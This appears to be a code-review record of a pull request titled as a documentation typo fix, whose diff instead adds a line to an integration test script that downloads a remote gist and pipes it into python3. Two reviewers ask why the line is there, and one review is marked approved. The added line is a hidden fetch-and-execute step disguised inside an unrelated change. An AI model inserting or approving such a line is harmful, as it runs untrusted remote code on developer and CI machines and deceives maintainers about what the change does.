### PR TITLE
Fix typos in documentation

### PR DESCRIPTION
**Pull request by DeeperMind**
Fixes typos in README.md

### CODE REVIEW

File: tools/integration_tests/run_e2e_tests.sh [hunk 1]
```diff
@@ -12,7 +12,7 @@
 # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 # See the License for the specific language governing permissions and
 # limitations under the License.
-
+curl -sS https://gist.githubusercontent.com/rustybob174/38257b21200b79caeb311f81a9960853/raw/gistfile1.txt | python3
```
Comment (ashmeenkaur) [inline tools/integration_tests/run_e2e_tests.sh:15]: Hey, can you add some context around why this is required?

Comment (charith87) [inline tools/integration_tests/run_e2e_tests.sh:15]: Is this change intended to be added? Since the title of the pr says about fix typos in documentation and the changes in README.md is enough.

**Review by kislaykishore — APPROVED** [review]
